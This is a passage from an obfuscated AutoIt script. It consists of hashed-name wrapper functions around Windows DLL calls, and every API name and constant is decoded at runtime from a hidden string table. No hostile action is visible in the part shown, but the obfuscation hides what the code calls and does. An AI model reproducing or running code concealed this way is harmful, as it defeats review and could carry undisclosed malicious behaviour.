  2930.         Global $ssa0d70d0171d = 1
  2931.     EndIf
  2932.     Local $a505a20190d = DllCall($a5aa171082f, $a07a1811e3e, $a11a191611e, $a56a1a12e26, $a3eca000d54, $a30a1b1404d, $a2f6de02137, $a28a1c1114c, $a4ba161192e)
  2933.     If @error Then Return SetError(@error, @extended, False)
  2934.     Return $a505a20190d[Number($a0ca1d1294e)]
  2935. EndFunc
  2936.  
  2937. Func a0d70e01a5a($a32ac505260, $a3f8d803d27, $a568d905c12)
  2938.     If NOT IsDeclared("SSA0D70E01A5A") Then
  2939.         Global $a27a1e11b53 = a2b00005424($os[2588]), $a4ca1f10024 = a2b00005424($os[2589]), $a13b101041f = a2b00005424($os[2590]), $a2ab1110510 = a2b00005424($os[2591]), $a2cb121513f = a2b00005424($os[2592]), $a27b131005d = a2b00005424($os[2593]), $a58b1413622 = a2b00005424($os[2594])
  2940.         Global $ssa0d70e01a5a = 1
  2941.     EndIf
  2942.     Local $a505a20190d = DllCall($a27a1e11b53, $a4ca1f10024, $a13b101041f, $a2ab1110510, $a32ac505260, $a2cb121513f, $a3f8d803d27, $a27b131005d, $a568d905c12)
  2943.     If @error Then Return SetError(@error, @extended, False)
  2944.     Return $a505a20190d[Number($a58b1413622)]
  2945. EndFunc
  2946.  
  2947. Func a0770f0013f($a348dc0280a, $a1bb1511e4a)
  2948.     If NOT IsDeclared("SSA0770F0013F") Then
  2949.         Global $a5db171585b = a2b00005424($os[2595]), $a61b1810f0c = a2b00005424($os[2596]), $a4bb1915e39 = a2b00005424($os[2597]), $a4cb1a13942 = a2b00005424($os[2598]), $a4ab1b11a1d = a2b00005424($os[2599]), $a07b1c14b50 = a2b00005424($os[2600]), $a5eb1d12603 = a2b00005424($os[2601]), $a52b1e1344e = a2b00005424($os[2602])
  2950.         Global $ssa0770f0013f = 1
  2951.     EndIf
  2952.     Local $a2eb1610a54 = $a5db171585b
  2953.     If IsString($a1bb1511e4a) Then $a2eb1610a54 = $a61b1810f0c
  2954.     Local $a505a20190d = DllCall($a4bb1915e39, $a4cb1a13942, $a4ab1b11a1d, $a07b1c14b50, $a348dc0280a, $a2eb1610a54, $a1bb1511e4a)
  2955.     If @error Then Return SetError(@error, @extended, Number($a5eb1d12603))
  2956.     Return $a505a20190d[Number($a52b1e1344e)]
  2957. EndFunc
  2958.  
  2959. Func a4880004c37($a348dc0280a, $a09b1f13c4f, $a2cc1013022, $a4bc1110260, $a13c1212a03, $a39c1310224)
  2960.     If NOT IsDeclared("SSA4880004C37") Then
  2961.         Global $a0cc1514a5f = a2b00005424($os[2603]), $a30c1613622 = a2b00005424($os[2604]), $a2bc1712358 = a2b00005424($os[2605]), $a19c1811a17 = a2b00005424($os[2606]), $a16c1912b29 = a2b00005424($os[2607]), $a16c1a12947 = a2b00005424($os[2608]), $a50c1b1451c = a2b00005424($os[2609]), $a01c1c13561 = a2b00005424($os[2610]), $a2dc1d15505 = a2b00005424($os[2611]), $a62c1e1333d = a2b00005424($os[2612]), $a1dc1f1495f = a2b00005424($os[2613]), $a24d101271d = a2b00005424($os[2614])
  2962.         Global $ssa4880004c37 = 1
  2963.     EndIf
  2964.     Local $a505a20190d, $a43c1410941 = $a0cc1514a5f
  2965.     If IsString($a09b1f13c4f) Then $a43c1410941 = $a30c1613622
  2966.     $a505a20190d = DllCall($a2bc1712358, $a19c1811a17, $a16c1912b29, $a16c1a12947, $a348dc0280a, $a43c1410941, $a09b1f13c4f, $a50c1b1451c, $a2cc1013022, $a01c1c13561, $a4bc1110260, $a2dc1d15505, $a13c1212a03, $a62c1e1333d, $a39c1310224)
  2967.     If @error Then Return SetError(@error, @extended, Number($a1dc1f1495f))
  2968.     Return $a505a20190d[Number($a24d101271d)]
  2969. EndFunc
  2970.  
  2971. Func a3180105e2f($a30cc405a22)
  2972.     If NOT IsDeclared("SSA3180105E2F") Then
  2973.         Global $a23d111094d = a2b00005424($os[2615]), $a3cd1215d26 = a2b00005424($os[2616]), $a4bd1314a48 = a2b00005424($os[2617]), $a60d1412f61 = a2b00005424($os[2618]), $a26d151110b = a2b00005424($os[2619]), $a3dd1613a47 = a2b00005424($os[2620])
  2974.         Global $ssa3180105e2f = 1
  2975.     EndIf
  2976.     Local $a505a20190d = DllCall($a23d111094d, $a3cd1215d26, $a4bd1314a48, $a60d1412f61, $a30cc405a22)
  2977.     If @error Then Return SetError(@error, @extended, Number($a26d151110b))
  2978.     Return $a505a20190d[Number($a3dd1613a47)]
  2979. EndFunc
  2980.  
  2981. Func a5580201c50($a30cc405a22, $a103d00243d = 0)
  2982.     If NOT IsDeclared("SSA5580201C50") Then
  2983.         Global $a09d171600f = a2b00005424($os[2621]), $a3dd181371c = a2b00005424($os[2622]), $a26d1912507 = a2b00005424($os[2623]), $a3fd1a1625c = a2b00005424($os[2624]), $a3bd1b16158 = a2b00005424($os[2625]), $a06d1c10118 = a2b00005424($os[2626]), $a0fd1d12c40 = a2b00005424($os[2627]), $a45d1e16059 = a2b00005424($os[2628]), $a63d1f11a41 = a2b00005424($os[2629])
  2984.         Global $ssa5580201c50 = 1
  2985.     EndIf
  2986.     Local $a505a20190d = DllCall($a09d171600f, $a3dd181371c, $a26d1912507, $a3fd1a1625c, $a30cc405a22, $a3bd1b16158, Number($a06d1c10118), $a0fd1d12c40, $a103d00243d)
  2987.     If @error Then Return SetError(@error, @extended, Number($a45d1e16059))
  2988.     Return $a505a20190d[Number($a63d1f11a41)]
  2989. EndFunc
  2990.  
  2991. Func a5480300f19($a39e1012153)
  2992.     If NOT IsDeclared("SSA5480300F19") Then
  2993.         Global $a59e121123b = a2b00005424($os[2630]), $a50e1312e3b = a2b00005424($os[2631]), $a3ce141264b = a2b00005424($os[2632]), $a0ee1512d23 = a2b00005424($os[2633]), $a1fe1615e22 = a2b00005424($os[2634]), $a53e1714600 = a2b00005424($os[2635]), $a3ee181613e = a2b00005424($os[2636]), $a5ee1915a17 = a2b00005424($os[2637]), $a4ce1a14932 = a2b00005424($os[2638]), $a5fe1b1512f = a2b00005424($os[2639])
  2994.         Global $ssa5480300f19 = 1
  2995.     EndIf
  2996.     Local $a2ce1115327 = DllStructCreate($a59e121123b)
  2997.     Local $a097e503e5c = a3130301d12($a50e1312e3b, $a39e1012153, Number($a3ce141264b), $a2ce1115327, Number($a0ee1512d23))
  2998.     If @error Then Return SetError(@error, @extended, Number($a1fe1615e22))
  2999.     If $a097e503e5c <= Number($a53e1714600) Then Return SetError(Number($a3ee181613e), Number($a5ee1915a17), Number($a4ce1a14932))
  3000.     Return DllStructGetData($a2ce1115327, $a5fe1b1512f)
  3001. EndFunc
  3002.  
  3003. Func a1680405600($a348dc0280a, $a13e1c13055)
  3004.     If NOT IsDeclared("SSA1680405600") Then
  3005.         Global $a1ee1d10d34 = a2b00005424($os[2640]), $a50e1e11817 = a2b00005424($os[2641]), $a61e1f14107 = a2b00005424($os[2642]), $a3ef1011b03 = a2b00005424($os[2643]), $a24f1110c03 = a2b00005424($os[2644]), $a43f1212e2d = a2b00005424($os[2645]), $a28f1310d31 = a2b00005424($os[2646]), $a54f141391a = a2b00005424($os[2647]), $a12f1513154 = a2b00005424($os[2648]), $a32f1615046 = a2b00005424($os[2649])
  3006.         Global $ssa1680405600 = 1
  3007.     EndIf
  3008.     Local $a505a20190d = DllCall($a1ee1d10d34, $a50e1e11817, $a61e1f14107, $a3ef1011b03, $a348dc0280a, $a24f1110c03, $a13e1c13055, $a43f1212e2d, "", $a28f1310d31, Number($a54f141391a))
  3009.     If @error Then Return SetError(@error, @extended, "")
  3010.     Return SetExtended($a505a20190d[Number($a12f1513154)], $a505a20190d[Number($a32f1615046)])
  3011. EndFunc
  3012.  
  3013. Func a5380504f5c($a40f1712160)
  3014.     If NOT IsDeclared("SSA5380504F5C") Then
  3015.         Global $a44f1815906 = a2b00005424($os[2650]), $a55f1913006 = a2b00005424($os[2651]), $a1af1a15f10 = a2b00005424($os[2652]), $a4ef1b12d03 = a2b00005424($os[2653]), $a44f1c12206 = a2b00005424($os[2654])
  3016.         Global $ssa5380504f5c = 1
  3017.     EndIf
  3018.     Local $a505a20190d = DllCall($a44f1815906, $a55f1913006, $a1af1a15f10, $a4ef1b12d03, $a40f1712160)
  3019.     If @error Then Return SetError(@error, @extended, False)
  3020.     Return $a505a20190d[Number($a44f1c12206)]
  3021. EndFunc
  3022.  
  3023. Func a4b80604d14($a5471911552)
  3024.     If NOT IsDeclared("SSA4B80604D14") Then
  3025.         Global $a1af1d14225 = a2b00005424($os[2655])
  3026.         Global $ssa4b80604d14 = 1
  3027.     EndIf
  3028.     Return BitAND($a5471911552, Number($a1af1d14225))
  3029. EndFunc
  3030.  
  3031. Func a0880703149($a17f1e10a03, $a06f1f15c02)
  3032.     If NOT IsDeclared("SSA0880703149") Then
  3033.         Global $a2002013153 = a2b00005424($os[2656])
  3034.         Global $ssa0880703149 = 1
  3035.     EndIf
  3036.     Return BitOR(BitShift($a06f1f15c02, -Number($a2002013153)), $a17f1e10a03)
  3037. EndFunc
  3038.  
  3039. Func a2380800830($a5e02113900, $a3402213a10)
  3040.     If NOT IsDeclared("SSA2380800830") Then
  3041.         Global $a4b0231523f = a2b00005424($os[2657])
  3042.         Global $ssa2380800830 = 1
  3043.     EndIf
  3044.     Return BitOR(BitShift($a3402213a10, -Number($a4b0231523f)), $a5e02113900)
  3045. EndFunc
  3046.  
  3047. Func a158090254f($a5b02413833, $a530251553d)
  3048.     If NOT IsDeclared("SSA158090254F") Then
  3049.         Global $a2702612433 = a2b00005424($os[2658]), $a2702711c2b = a2b00005424($os[2659])
  3050.         Global $ssa158090254f = 1
  3051.     EndIf
  3052.     Return BitOR(BitShift($a530251553d, -Number($a2702612433)), BitAND($a5b02413833, Number($a2702711c2b)))
  3053. EndFunc
  3054.  
  3055. Func a2b80a04557($a5002815354, $a1f02911223)
  3056.     If NOT IsDeclared("SSA2B80A04557") Then
  3057.         Global $a2902b15420 = a2b00005424($os[2660]), $a4d02d15e16 = a2b00005424($os[2661]), $a1702e1290f = a2b00005424($os[2662]), $a3302f15943 = a2b00005424($os[2663]), $a5112012112 = a2b00005424($os[2664])
  3058.         Global $ssa2b80a04557 = 1
  3059.     EndIf
  3060.     Local $a2802a15d14 = DllStructCreate($a2902b15420)
  3061.     Local $a2702c10f06 = DllStructCreate($a4d02d15e16, DllStructGetPtr($a2802a15d14))
  3062.     DllStructSetData($a2702c10f06, Number($a1702e1290f), $a5002815354)
  3063.     DllStructSetData($a2702c10f06, Number($a3302f15943), $a1f02911223)
  3064.     Return DllStructGetData($a2802a15d14, Number($a5112012112))
  3065. EndFunc
  3066.  
  3067. Func a0a80b04320($a2cc1013022 = 1)
  3068.     If NOT IsDeclared("SSA0A80B04320") Then
  3069.         Global $a0312210a3d = a2b00005424($os[2665]), $a1412315b29 = a2b00005424($os[2666]), $a5212411249 = a2b00005424($os[2667]), $a5c1251252b = a2b00005424($os[2668]), $a2d12612608 = a2b00005424($os[2669]), $a331271442c = a2b00005424($os[2670]), $a0812812235 = a2b00005424($os[2671]), $a4f12915e4f = a2b00005424($os[2672]), $a1412a1471d = a2b00005424($os[2673]), $a2712b12b39 = a2b00005424($os[2674]), $a1b12c10d2f = a2b00005424($os[2675]), $a2412d13162 = a2b00005424($os[2676]), $a4612e12b0a = a2b00005424($os[2677]), $a0a12f1041c = a2b00005424($os[2678]), $a3622015802 = a2b00005424($os[2679]), $a192211372d = a2b00005424($os[2680])
  3070.         Global $ssa0a80b04320 = 1
  3071.     EndIf
  3072.     Local $a5512115b3b
  3073.     Switch $a2cc1013022
  3074.         Case Number($a0312210a3d)
  3075.             $a5512115b3b = Number($a1412315b29)
  3076.         Case Number($a5212411249)
  3077.             $a5512115b3b = Number($a5c1251252b)
  3078.         Case Number($a2d12612608)
  3079.             $a5512115b3b = Number($a331271442c)
  3080.         Case Number($a0812812235)
  3081.             $a5512115b3b = Number($a4f12915e4f)
  3082.         Case Number($a1412a1471d)
  3083.             $a5512115b3b = Number($a2712b12b39)
  3084.         Case Else
  3085.             $a5512115b3b = -Number($a1b12c10d2f)
  3086.     EndSwitch
  3087.     Local $a505a20190d = DllCall($a2412d13162, $a4612e12b0a, $a0a12f1041c, $a3622015802, $a5512115b3b)
  3088.     If @error Then Return SetError(@error, @extended, False)
  3089.     Return $a505a20190d[Number($a192211372d)]
  3090. EndFunc
  3091.  
  3092. Func a3080c0075d($a103d00243d, $a04ff200620, $a09fd400f0d)
  3093.     If NOT IsDeclared("SSA3080C0075D") Then
  3094.         Global $a3e22212443 = a2b00005424($os[2681]), $a452231263c = a2b00005424($os[2682])
  3095.         Global $ssa3080c0075d = 1
  3096.     EndIf
  3097.     BlockInput(Number($a3e22212443))
  3098.     MsgBox($a103d00243d, $a04ff200620, $a09fd400f0d & $a452231263c)
  3099. EndFunc
  3100.  
  3101. Func a1780d02628($a103d00243d, $a3f8d803d27 = 0, $a568d905c12 = 0, $a3522412d0d = 0, $a1d22514322 = 0)
  3102.     If NOT IsDeclared("SSA1780D02628") Then
  3103.         Global $a5c22612f3e = a2b00005424($os[2683]), $a2b2271335e = a2b00005424($os[2684]), $a6322812c54 = a2b00005424($os[2685]), $a002291094e = a2b00005424($os[2686]), $a0022a13a4f = a2b00005424($os[2687]), $a4122b11133 = a2b00005424($os[2688]), $a5522c1113a = a2b00005424($os[2689]), $a1b22d14c31 = a2b00005424($os[2690])
  3104.         Global $ssa1780d02628 = 1
  3105.     EndIf
  3106.     DllCall($a5c22612f3e, $a2b2271335e, $a6322812c54, $a002291094e, $a103d00243d, $a0022a13a4f, $a3f8d803d27, $a4122b11133, $a568d905c12, $a5522c1113a, $a3522412d0d, $a1b22d14c31, $a1d22514322)
  3107.     If @error Then Return SetError(@error, @extended)
  3108. EndFunc
  3109.  
  3110. Func a0680e0105f($a32ac505260, $a3f8d803d27, $a568d905c12)
  3111.     If NOT IsDeclared("SSA0680E0105F") Then
  3112.         Global $a5622e12a11 = a2b00005424($os[2691]), $a3622f11745 = a2b00005424($os[2692]), $a2b32011f05 = a2b00005424($os[2693]), $a3132113154 = a2b00005424($os[2694]), $a053221190a = a2b00005424($os[2695]), $a0832315b11 = a2b00005424($os[2696]), $a2a32410329 = a2b00005424($os[2697]), $a5532512307 = a2b00005424($os[2698]), $a033261294e = a2b00005424($os[2699])
  3113.         Global $ssa0680e0105f = 1
  3114.     EndIf
  3115.     Local $a505a20190d = DllCall($a5622e12a11, $a3622f11745, $a2b32011f05, $a3132113154, $a32ac505260, $a053221190a, $a3f8d803d27, $a0832315b11, $a568d905c12, $a2a32410329, Number($a5532512307))
  3116.     If @error Then Return SetError(@error, @extended, False)
  3117.     Return $a505a20190d[Number($a033261294e)]
  3118. EndFunc
  3119.  
  3120. Func a5c80f00522($a3eca000d54, $a3f8d803d27, $a568d905c12, $a21eba0242b, $a1debb02625, $a2c32710e2d = True)
  3121.     If NOT IsDeclared("SSA5C80F00522") Then
  3122.         Global $a4332810220 = a2b00005424($os[2700]), $a2f32912500 = a2b00005424($os[2701]), $a2d32a1014b = a2b00005424($os[2702]), $a4632b14d03 = a2b00005424($os[2703]), $a4232c11d4e = a2b00005424($os[2704]), $a4e32d12f42 = a2b00005424($os[2705]), $a5832e1151a = a2b00005424($os[2706]), $a4c32f12d4b = a2b00005424($os[2707]), $a2442015963 = a2b00005424($os[2708]), $a1f4211300b = a2b00005424($os[2709])
  3123.         Global $ssa5c80f00522 = 1
  3124.     EndIf
  3125.     Local $a505a20190d = DllCall($a4332810220, $a2f32912500, $a2d32a1014b, $a4632b14d03, $a3eca000d54, $a4232c11d4e, $a3f8d803d27, $a4e32d12f42, $a568d905c12, $a5832e1151a, $a21eba0242b, $a4c32f12d4b, $a1debb02625, $a2442015963, $a2c32710e2d)
  3126.     If @error Then Return SetError(@error, @extended, False)
  3127.     Return $a505a20190d[Number($a1f4211300b)]
  3128. EndFunc
  3129.  
  3130. Func a5d90003027($a0142210e3a, $a0c42312822, $a0b4241205a)
  3131.     If NOT IsDeclared("SSA5D90003027") Then
  3132.         Global $a5442511905 = a2b00005424($os[2710]), $a6242613d61 = a2b00005424($os[2711]), $a4342710445 = a2b00005424($os[2712]), $a3142814b51 = a2b00005424($os[2713]), $a1842914c37 = a2b00005424($os[2714]), $a2a42a14215 = a2b00005424($os[2715]), $a4542b13e02 = a2b00005424($os[2716]), $a3842c1605a = a2b00005424($os[2717])
  3133.         Global $ssa5d90003027 = 1
  3134.     EndIf
  3135.     Local $a505a20190d = DllCall($a5442511905, $a6242613d61, $a4342710445, $a3142814b51, $a0142210e3a, $a1842914c37, $a0c42312822, $a2a42a14215, $a0b4241205a)
  3136.     If @error Then Return SetError(@error, @extended, -Number($a4542b13e02))
  3137.     Return $a505a20190d[Number($a3842c1605a)]
  3138. EndFunc
  3139.  
  3140. Func a3c90104f55($a09fd400f0d, $a1c42d14550 = 0, $a103d00243d = 0, $a2e42e13f28 = False)
  3141.     If NOT IsDeclared("SSA3C90104F55") Then
  3142.         Global $a1852011705 = a2b00005424($os[2718]), $a6352113329 = a2b00005424($os[2719]), $a2452215728 = a2b00005424($os[2720]), $a1f5231560b = a2b00005424($os[2721]), $a4b5241015f = a2b00005424($os[2722]), $a5352515d5f = a2b00005424($os[2723]), $a1352611919 = a2b00005424($os[2724]), $a1a52713701 = a2b00005424($os[2725]), $a3052811651 = a2b00005424($os[2726]), $a2552911146 = a2b00005424($os[2727]), $a0e52a12b34 = a2b00005424($os[2728]), $a0d52b10344 = a2b00005424($os[2729]), $a0d52c15f12 = a2b00005424($os[2730]), $a3d52d1532d = a2b00005424($os[2731]), $a3252f11561 = a2b00005424($os[2732]), $a5662114e5b = a2b00005424($os[2733]), $a5e62215643 = a2b00005424($os[2734]), $a5b62315f18 = a2b00005424($os[2735]), $a1e62415259 = a2b00005424($os[2736]), $a2062511c38 = a2b00005424($os[2737]), $a5262616008 = a2b00005424($os[2738]), $a606271140a = a2b00005424($os[2739]), $a4762812f1a = a2b00005424($os[2740]), $a0f6291022a = a2b00005424($os[2741]), $a2862a10a60 = a2b00005424($os[2742]), $a2b62b1582f = a2b00005424($os[2743]), $a5062c13616 = a2b00005424($os[2744]), $a6362d11417 = a2b00005424($os[2745])
  3143.         Global $ssa3c90104f55 = 1
  3144.     EndIf
  3145.     Local $a5742f14331 = $a1852011705
  3146.     If NOT IsString($a09fd400f0d) Then $a5742f14331 = $a6352113329
  3147.     Local $a505a20190d = DllCall($a2452215728, $a1f5231560b, $a4b5241015f, $a5352515d5f, $a1c42d14550, $a1352611919, $a103d00243d, $a5742f14331, $a09fd400f0d, $a1a52713701, -Number($a3052811651), $a2552911146, Number($a0e52a12b34), $a0d52b10344, Number($a0d52c15f12))
  3148.     If @error Then Return SetError(@error, @extended, Number($a3d52d1532d))
  3149.     Local $a3552e10620 = $a505a20190d[Number($a3252f11561)]
  3150.     Local $a3e62010245 = DllStructCreate($a5662114e5b & $a3552e10620 & $a5e62215643)
  3151.     $a505a20190d = DllCall($a5b62315f18, $a1e62415259, $a2062511c38, $a5262616008, $a1c42d14550, $a606271140a, $a103d00243d, $a5742f14331, $a09fd400f0d, $a4762812f1a, -Number($a0f6291022a), $a2862a10a60, $a3e62010245, $a2b62b1582f, $a3552e10620)
  3152.     If @error Then Return SetError(@error, @extended, Number($a5062c13616))
  3153.     If $a2e42e13f28 Then Return DllStructGetData($a3e62010245, Number($a6362d11417))
  3154.     Return $a3e62010245
  3155. EndFunc
  3156.  
  3157. Func a1a90205e56($a09fd400f0d, $a5a62e15f53, $a1c42d14550 = 0, $a103d00243d = 0)
  3158.     If NOT IsDeclared("SSA1A90205E56") Then
  3159.         Global $a3c62f13e56 = a2b00005424($os[2746]), $a547201322f = a2b00005424($os[2747]), $a2972115d2e = a2b00005424($os[2748]), $a0e72215f08 = a2b00005424($os[2749]), $a4c72312020 = a2b00005424($os[2750]), $a5472413c50 = a2b00005424($os[2751]), $a2b7251283e = a2b00005424($os[2752]), $a537261495c = a2b00005424($os[2753]), $a0d72712f1d = a2b00005424($os[2754]), $a217281362e = a2b00005424($os[2755]), $a1b72913204 = a2b00005424($os[2756]), $a5e72a13f5b = a2b00005424($os[2757]), $a3872b15501 = a2b00005424($os[2758])
  3160.         Global $ssa1a90205e56 = 1
  3161.     EndIf
  3162.     Local $a505a20190d = DllCall($a3c62f13e56, $a547201322f, $a2972115d2e, $a0e72215f08, $a1c42d14550, $a4c72312020, $a103d00243d, $a5472413c50, $a09fd400f0d, $a2b7251283e, -Number($a537261495c), $a0d72712f1d, $a5a62e15f53, $a217281362e, (StringLen($a09fd400f0d) + Number($a1b72913204)) * Number($a5e72a13f5b))
  3163.     If @error Then Return SetError(@error, @extended, False)
  3164.     Return $a505a20190d[Number($a3872b15501)]
  3165. EndFunc
  3166.  
  3167. Func a1290301a13($a49cc60131c, $a0f2df01952, $a62cbf0122a, $a5d72c10e58 = False)
  3168.     If NOT IsDeclared("SSA1290301A13") Then
  3169.         Global $a3472d13941 = a2b00005424($os[2759]), $a1d72e1303e = a2b00005424($os[2760]), $a5b72f10163 = a2b00005424($os[2761]), $a1e82016345 = a2b00005424($os[2762]), $a2f8211302a = a2b00005424($os[2763]), $a0582210339 = a2b00005424($os[2764]), $a048231334d = a2b00005424($os[2765]), $a4882410d2b = a2b00005424($os[2766]), $a0c82512547 = a2b00005424($os[2767]), $a348261011e = a2b00005424($os[2768]), $a268281193c = a2b00005424($os[2769]), $a108291391a = a2b00005424($os[2770]), $a0282d12c40 = a2b00005424($os[2771]), $a4882e11e40 = a2b00005424($os[2772]), $a3282f11443 = a2b00005424($os[2773]), $a3592014e24 = a2b00005424($os[2774]), $a589211022e = a2b00005424($os[2775]), $a5e92214d2f = a2b00005424($os[2776]), $a0a92311619 = a2b00005424($os[2777]), $a1592411d4d = a2b00005424($os[2778]), $a0a9251453e = a2b00005424($os[2779]), $a1392612b2f = a2b00005424($os[2780])
  3170.         Global $ssa1290301a13 = 1
  3171.     EndIf
  3172.     Local $a505a20190d = DllCall($a3472d13941, $a1d72e1303e, $a5b72f10163, $a1e82016345, $a49cc60131c, $a2f8211302a, $a0f2df01952, $a0582210339, $a62cbf0122a)
  3173.     If @error Then Return SetError(@error, @extended, Number($a048231334d))
  3174.     If $a505a20190d[Number($a4882410d2b)] Then Return $a505a20190d[Number($a0c82512547)]
  3175.     If NOT $a5d72c10e58 Then Return Number($a348261011e)
  3176.     Local $a5082710732 = a0bd0d04a04(BitOR($a09c9804f35, $a17c9401a48))
  3177.     If @error Then Return SetError(@error, @extended, Number($a268281193c))
  3178.     a2fd0e03a10($a5082710732, $a108291391a, True)
  3179.     Local $a3182a1024a = @error
  3180.     Local $a4382b16262 = @extended
  3181.     Local $a0182c13d56 = Number($a0282d12c40)
  3182.     If NOT @error Then
  3183.         $a505a20190d = DllCall($a4882e11e40, $a3282f11443, $a3592014e24, $a589211022e, $a49cc60131c, $a5e92214d2f, $a0f2df01952, $a0a92311619, $a62cbf0122a)
  3184.         $a3182a1024a = @error
  3185.         $a4382b16262 = @extended
  3186.         If $a505a20190d[Number($a1592411d4d)] Then $a0182c13d56 = $a505a20190d[Number($a0a9251453e)]
  3187.         a2fd0e03a10($a5082710732, $a1392612b2f, False)
  3188.         If @error Then
  3189.             $a3182a1024a = @error
  3190.             $a4382b16262 = @extended
  3191.         EndIf
  3192.     EndIf
  3193.     a4100c04723($a5082710732)
  3194.     Return SetError($a3182a1024a, $a4382b16262, $a0182c13d56)
  3195. EndFunc
  3196.  
  3197. Func a5790403f1e($a1992711431)
  3198.     If NOT IsDeclared("SSA5790403F1E") Then
  3199.         Global $a4892812c3d = a2b00005424($os[2781]), $a1b92913920 = a2b00005424($os[2782]), $a3492a12a0d = a2b00005424($os[2783]), $a3992c12161 = a2b00005424($os[2784]), $a2b92d14b33 = a2b00005424($os[2785]), $a0b92e1434e = a2b00005424($os[2786]), $a5792f12a5f = a2b00005424($os[2787]), $a5aa201022b = a2b00005424($os[2788]), $a02a211623a = a2b00005424($os[2789]), $a14a2210b19 = a2b00005424($os[2790]), $a3ca2314f58 = a2b00005424($os[2791]), $a41a2415127 = a2b00005424($os[2792]), $a1fa2511120 = a2b00005424($os[2793]), $a23a2611454 = a2b00005424($os[2794])
  3200.         Global $ssa5790403f1e = 1
  3201.     EndIf
  3202.     Local $a03fff05b24[Number($a4892812c3d)]
  3203.     $a03fff05b24[Number($a1b92913920)] = Number($a3492a12a0d)
  3204.     Local $a5a92b14d1f = StringMid($a1992711431, Number($a3992c12161), StringInStr($a1992711431, $a2b92d14b33, Number($a0b92e1434e), -Number($a5792f12a5f)) - Number($a5aa201022b))
  3205.     $a03fff05b24[Number($a02a211623a)] = $a5a92b14d1f
  3206.     $a03fff05b24[Number($a14a2210b19)] = StringMid($a1992711431, StringInStr($a1992711431, $a3ca2314f58, Number($a41a2415127), -Number($a1fa2511120)) + Number($a23a2611454))
  3207.     Return $a03fff05b24
  3208. EndFunc
  3209.  
  3210. Func a2290501935(Const $a2ea2715651, $a59a2815d58 = "", Const $a46a2910c3a = @LF)
  3211.     If NOT IsDeclared("SSA2290501935") Then
  3212.         Global $a2ea2b13c14 = a2b00005424($os[2795]), $a4aa2c10a13 = a2b00005424($os[2796]), $a1ca2d12315 = a2b00005424($os[2797]), $a19a2e13a57 = a2b00005424($os[2798]), $a50b2311248 = a2b00005424($os[2799]), $a54b2413040 = a2b00005424($os[2800]), $a26b2514c25 = a2b00005424($os[2801]), $a60b2614540 = a2b00005424($os[2802]), $a4fb271113d = a2b00005424($os[2803]), $a0bb2811408 = a2b00005424($os[2804]), $a08b291444e = a2b00005424($os[2805]), $a1bb2a15d15 = a2b00005424($os[2806]), $a0ab2b13725 = a2b00005424($os[2807]), $a14b2c16157 = a2b00005424($os[2808]), $a37b2d12221 = a2b00005424($os[2809]), $a0bb2e11f3a = a2b00005424($os[2810]), $a31b2f11c58 = a2b00005424($os[2811]), $a5dc201400a = a2b00005424($os[2812]), $a4fc211502d = a2b00005424($os[2813]), $a4dc2213f28 = a2b00005424($os[2814]), $a12c2316236 = a2b00005424($os[2815]), $a52c2414b5d = a2b00005424($os[2816]), $a50c251535e = a2b00005424($os[2817]), $a5bc2611b13 = a2b00005424($os[2818]), $a2ec271063c = a2b00005424($os[2819]), $a3ac2815a5c = a2b00005424($os[2820])
  3213.         Global $ssa2290501935 = 1
  3214.     EndIf
  3215.     Local $a58a2a10607 = Number($a2ea2b13c14)
  3216.     If IsString($a59a2815d58) Then
  3217.         If StringLen($a59a2815d58) Then
  3218.             $a59a2815d58 = StringSplit($a59a2815d58, $a46a2910c3a, Number($a4aa2c10a13) + Number($a1ca2d12315))
  3219.             $a58a2a10607 = UBound($a59a2815d58, Number($a19a2e13a57))
  3220.         EndIf
  3221.     ElseIf IsArray($a59a2815d58) Then
  3222.         $a58a2a10607 = UBound($a59a2815d58)
  3223.     EndIf
  3224.     Local $a5da2f12106, $a2eb2014b02
  3225.     If $a58a2a10607 Then
  3226.         Local $a2ab2116139 = ""
  3227.         For $a10b2214360 In $a59a2815d58
  3228.             $a2ab2116139 &= $a50b2311248 & StringLen($a10b2214360) + Number($a54b2413040) & $a26b2514c25
  3229.         Next
  3230.         $a5da2f12106 = DllStructCreate($a2ab2116139)
  3231.         $a2eb2014b02 = DllStructCreate($a60b2614540 & $a58a2a10607 + Number($a4fb271113d) & $a0bb2811408)
  3232.         For $a3800e12616 = Number($a08b291444e) To $a58a2a10607
  3233.             DllStructSetData($a5da2f12106, $a3800e12616, $a59a2815d58[$a3800e12616 - Number($a1bb2a15d15)])
  3234.             DllStructSetData($a2eb2014b02, Number($a0ab2b13725), DllStructGetPtr($a5da2f12106, $a3800e12616), $a3800e12616)
  3235.         Next
  3236.         DllStructSetData($a2eb2014b02, Number($a14b2c16157), Ptr(Number($a37b2d12221)), $a58a2a10607 + Number($a0bb2e11f3a))
  3237.     EndIf
  3238.     Local $a505a20190d = DllCall($a31b2f11c58, $a5dc201400a, $a4fc211502d, $a4dc2213f28, $a2ea2715651, $a12c2316236, $a2eb2014b02)
  3239.     If @error Then Return SetError(@error, @extended, False)
  3240.     If $a505a20190d[Number($a52c2414b5d)] = Number($a50c251535e) Then Return SetError(Number($a5bc2611b13), Number($a2ec271063c), $a2ea2715651)
  3241.     Return $a505a20190d[Number($a3ac2815a5c)]
  3242. EndFunc
  3243.  
  3244. Func a0290601330(ByRef $a2f6de02137, $a53c2916247 = True)
  3245.     If NOT IsDeclared("SSA0290601330") Then
  3246.         Global $a47c2a15408 = a2b00005424($os[2821]), $a22c2b1060b = a2b00005424($os[2822]), $a0cc2c11712 = a2b00005424($os[2823]), $a49c2d10f13 = a2b00005424($os[2824]), $a34c2e10032 = a2b00005424($os[2825]), $a58c2f1272f = a2b00005424($os[2826]), $a41d2015408 = a2b00005424($os[2827]), $a52d2111937 = a2b00005424($os[2828])
  3247.         Global $ssa0290601330 = 1
  3248.     EndIf
  3249.     Local $a32fd004162 = DllStructGetData($a2f6de02137, $a47c2a15408)
  3250.     Local $a17fd105720 = DllStructGetData($a2f6de02137, $a22c2b1060b)
  3251.     Local $a01fd201351 = DllStructGetData($a2f6de02137, $a0cc2c11712)
  3252.     Local $a28fd302613 = DllStructGetData($a2f6de02137, $a49c2d10f13)
  3253.     If $a53c2916247 Then
  3254.         $a32fd004162 = $a32fd004162 + (($a01fd201351 - $a32fd004162) / Number($a34c2e10032))
  3255.         $a17fd105720 = $a17fd105720 + (($a28fd302613 - $a17fd105720) / Number($a58c2f1272f))
  3256.     EndIf
  3257.     Local $a4d1c401e56 = DllStructCreate($a2928c0302e)
  3258.     DllStructSetData($a4d1c401e56, $a41d2015408, $a32fd004162)
